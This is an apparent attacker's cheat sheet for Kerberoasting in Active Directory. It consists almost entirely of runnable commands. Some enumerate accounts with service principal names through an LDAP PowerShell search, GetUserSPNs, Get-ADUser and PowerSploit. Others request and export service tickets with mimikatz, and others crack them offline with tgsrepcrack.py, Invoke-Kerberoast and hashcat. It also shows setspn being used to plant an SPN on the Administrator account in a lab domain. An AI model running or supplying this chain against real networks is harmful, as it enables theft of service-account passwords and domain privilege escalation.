Kerberoasting

service_class/hostname_or_FQDN
service_class/hostname_or_FQDN:port
service_class/hostname_or_FQDN:port/arbitrary_name

setspn.exe -U -S VNC2/ringdc-pc.ring2.com Administrator

#Build LDAP Filter to look for users with SPN values registered for current domain
$ldapFilter = "(&(objectclass=user)(objectcategory=user)(servicePrincipalName=*))"
$domain = New-Object System.DirectoryServices.DirectoryEntry
$search = New-Object System.DirectoryServices.DirectorySearcher
$search.SearchRoot = $domain
$search.PageSize = 1000
$search.Filter = $ldapFilter
$search.SearchScope = "Subtree"
#Execute Search
$results = $search.FindAll()
#Display SPN values from the returned objects
foreach ($result in $results)
{
    $userEntry = $result.GetDirectoryEntry()
    Write-Host "User Name = " $userEntry.name
    foreach ($SPN in $userEntry.servicePrincipalName)
    {
        Write-Host "SPN = " $SPN       
    }
    Write-Host ""    
}

GetUserSPNs.py -target-domain ring2.com ring2/win10:Test1234

.\GetUserSPNs.ps1

//Active Directory模块
get-aduser -filter {AdminCount -eq 1 -and (servicePrincipalName -ne 0)} -prop * |select name,whencreated,pwdlastset,lastlogon,serviceprincipalname,memberof

//PowerSploit
Get-NetUser -spn -AdminCount | Select name,whencreated,pwdlastset,lastlogon,serviceprincipalname,memberof

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'VNC2/ringdc-pc.ring2.com'

mimikatz # kerberos::list /export

// https://github.com/nidem/kerberoast
python tgsrepcrack.py pass.txt "..\1-40a10000-win10@VNC~ringdc-pc.ring2.com-RING2.COM.kirbi"

setspn.exe -D VNC2/ringdc-pc.ring2.com Administrator

// PowerSploit/Invoke-Kerberoast
Invoke-Kerberoast  -OutputFormat Hashcat | Select hash | ConvertTo-CSV -NoTypeInformation

hashcat -m 13100 /tmp/hash.txt /tmp/password.list -o found.txt --force